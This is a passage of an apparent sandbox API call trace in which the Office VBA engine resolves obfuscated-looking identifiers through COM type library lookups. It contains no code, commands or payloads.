pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.276] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.276] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.276] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.276] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.277] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.277] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.277] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.277] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.277] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.277] IUnknown:Release (This=0x665ba50) returned 0xd [0069.277] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.277] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.277] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62fe6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kXAQcAUA") returned 9 [0069.277] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kXAQcAUA", lHashVal=0x10bc57, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62fe6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kXAQcAUA") returned 9 [0069.277] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kXAQcAUA", lHashVal=0x10bc57, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62fe6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kXAQcAUA") returned 9 [0069.277] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kXAQcAUA", lHashVal=0x10bc57, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.277] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kXAQcAUA") returned 0x10bc57 [0069.277] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="kXAQcAUA" | out: _Dst="kXAQcAUA") returned 0x0 [0069.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="kXAQcAUA") returned 9 [0069.278] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.278] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kXAQcAUA", lHashVal=0x10bc57, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.278] IUnknown:Release (This=0x665ba50) returned 0xd [0069.278] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.278] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kXAQcAUA", lHashVal=0x10bc57, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.278] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.278] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.278] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kXAQcAUA", lHashVal=0x10bc57, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.278] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.278] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.278] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kXAQcAUA", lHashVal=0x10bc57, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.278] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62fe6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kXAQcAUA") returned 9 [0069.278] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kXAQcAUA", lHashVal=0x10bc57, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.278] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.278] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62fe6 | out: _Dst=0x67c2d40) returned 0x0 [0069.278] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kXAQcAUA") returned 0x1093e0 [0069.278] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_kXAQcAUA" | out: _Dst="_B_var_kXAQcAUA") returned 0x0 [0069.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_kXAQcAUA") returned 16 [0069.278] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.278] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kXAQcAUA", lHashVal=0x1093e0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.278] IUnknown:Release (This=0x665ba50) returned 0xd [0069.278] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.278] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kXAQcAUA", lHashVal=0x1093e0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.278] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.278] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.279] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kXAQcAUA", lHashVal=0x1093e0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.279] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.279] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.279] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kXAQcAUA", lHashVal=0x1093e0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.279] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.279] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.279] IUnknown:Release (This=0x665ba50) returned 0xd [0069.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11f9e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_kXAQcAUA") returned 16 [0069.279] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kXAQcAUA", lHashVal=0x1093e0, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x63005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x63005100000000, pDummy=0x0) returned 0x0 [0069.279] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62fe6 | out: _Dst=0x144ec0) returned 0x0 [0069.279] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nAZ4ABD", lHashVal=0x10ef22, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b800ee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAZ4ABD") returned 8 [0069.279] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nAZ4ABD", lHashVal=0x10ef22, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b800ee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAZ4ABD") returned 8 [0069.279] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nAZ4ABD", lHashVal=0x10ef22, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.279] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAZ4ABD") returned 0x10ef22 [0069.279] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="nAZ4ABD" | out: _Dst="nAZ4ABD") returned 0x0 [0069.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="nAZ4ABD") returned 8 [0069.279] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.279] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nAZ4ABD", lHashVal=0x10ef22, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.280] IUnknown:Release (This=0x665ba50) returned 0xd [0069.280] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.280] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nAZ4ABD", lHashVal=0x10ef22, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.280] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.280] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.280] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nAZ4ABD", lHashVal=0x10ef22, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.280] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.280] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.280] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nAZ4ABD", lHashVal=0x10ef22, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.280] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b800ee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAZ4ABD") returned 8 [0069.280] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nAZ4ABD", lHashVal=0x10ef22, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.280] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.280] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b800ee | out: _Dst=0x67c2d40) returned 0x0 [0069.280] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nAZ4ABD") returned 0x10f2a6 [0069.280] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_nAZ4ABD" | out: _Dst="_B_var_nAZ4ABD") returned 0x0 [0069.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_nAZ4ABD") returned 15 [0069.280] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.280] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nAZ4ABD", lHashVal=0x10f2a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.280] IUnknown:Release (This=0x665ba50) returned 0xd [0069.280] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.280] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nAZ4ABD", lHashVal=0x10f2a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.280] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.280] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.280] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nAZ4ABD", lHashVal=0x10f2a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.280] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.280] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.280] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nAZ4ABD", lHashVal=0x10f2a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.281] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.281] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.281] IUnknown:Release (This=0x665ba50) returned 0xd [0069.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11fce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_nAZ4ABD") returned 15 [0069.281] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nAZ4ABD", lHashVal=0x10f2a6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0069.281] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b800ee | out: _Dst=0x144ec0) returned 0x0 [0069.281] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rAX_XUA", lHashVal=0x107bc6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b800c6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rAX_XUA") returned 8 [0069.281] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rAX_XUA", lHashVal=0x107bc6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b800c6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rAX_XUA") returned 8 [0069.281] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rAX_XUA", lHashVal=0x107bc6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.281] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rAX_XUA") returned 0x107bc6 [0069.281] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="rAX_XUA" | out: _Dst="rAX_XUA") returned 0x0 [0069.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="rAX_XUA") returned 8 [0069.281] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.281] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="rAX_XUA", lHashVal=0x107bc6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.281] IUnknown:Release (This=0x665ba50) returned 0xd [0069.281] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.281] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="rAX_XUA", lHashVal=0x107bc6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.281] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.281] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.281] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="rAX_XUA", lHashVal=0x107bc6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.282] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.282] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.282] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="rAX_XUA", lHashVal=0x107bc6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.282] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b800c6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rAX_XUA") returned 8 [0069.282] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rAX_XUA", lHashVal=0x107bc6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.282] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.282] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b800c6 | out: _Dst=0x67c2d40) returned 0x0 [0069.282] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rAX_XUA") returned 0x106fc9 [0069.282] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_rAX_XUA" | out: _Dst="_B_var_rAX_XUA") returned 0x0 [0069.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_rAX_XUA") returned 15 [0069.282] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.282] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_rAX_XUA", lHashVal=0x106fc9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.282] IUnknown:Release (This=0x665ba50) returned 0xd [0069.282] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.282] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_rAX_XUA", lHashVal=0x106fc9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.282] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.282] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.282] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_rAX_XUA", lHashVal=0x106fc9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.282] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.282] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.283] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_rAX_XUA", lHashVal=0x106fc9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.283] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.283] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.283] IUnknown:Release (This=0x665ba50) returned 0xd [0069.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11ffe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_rAX_XUA") returned 15 [0069.283] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rAX_XUA", lHashVal=0x106fc9, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x58005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x58005f00000000, pDummy=0x0) returned 0x0 [0069.283] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b800c6 | out: _Dst=0x144ec0) returned 0x0 [0069.283] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fAkUABCD", lHashVal=0x10c76a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80116, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fAkUABCD") returned 9 [0069.283] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fAkUABCD", lHashVal=0x10c76a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80116, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fAkUABCD") returned 9 [0069.283] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fAkUABCD", lHashVal=0x10c76a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, 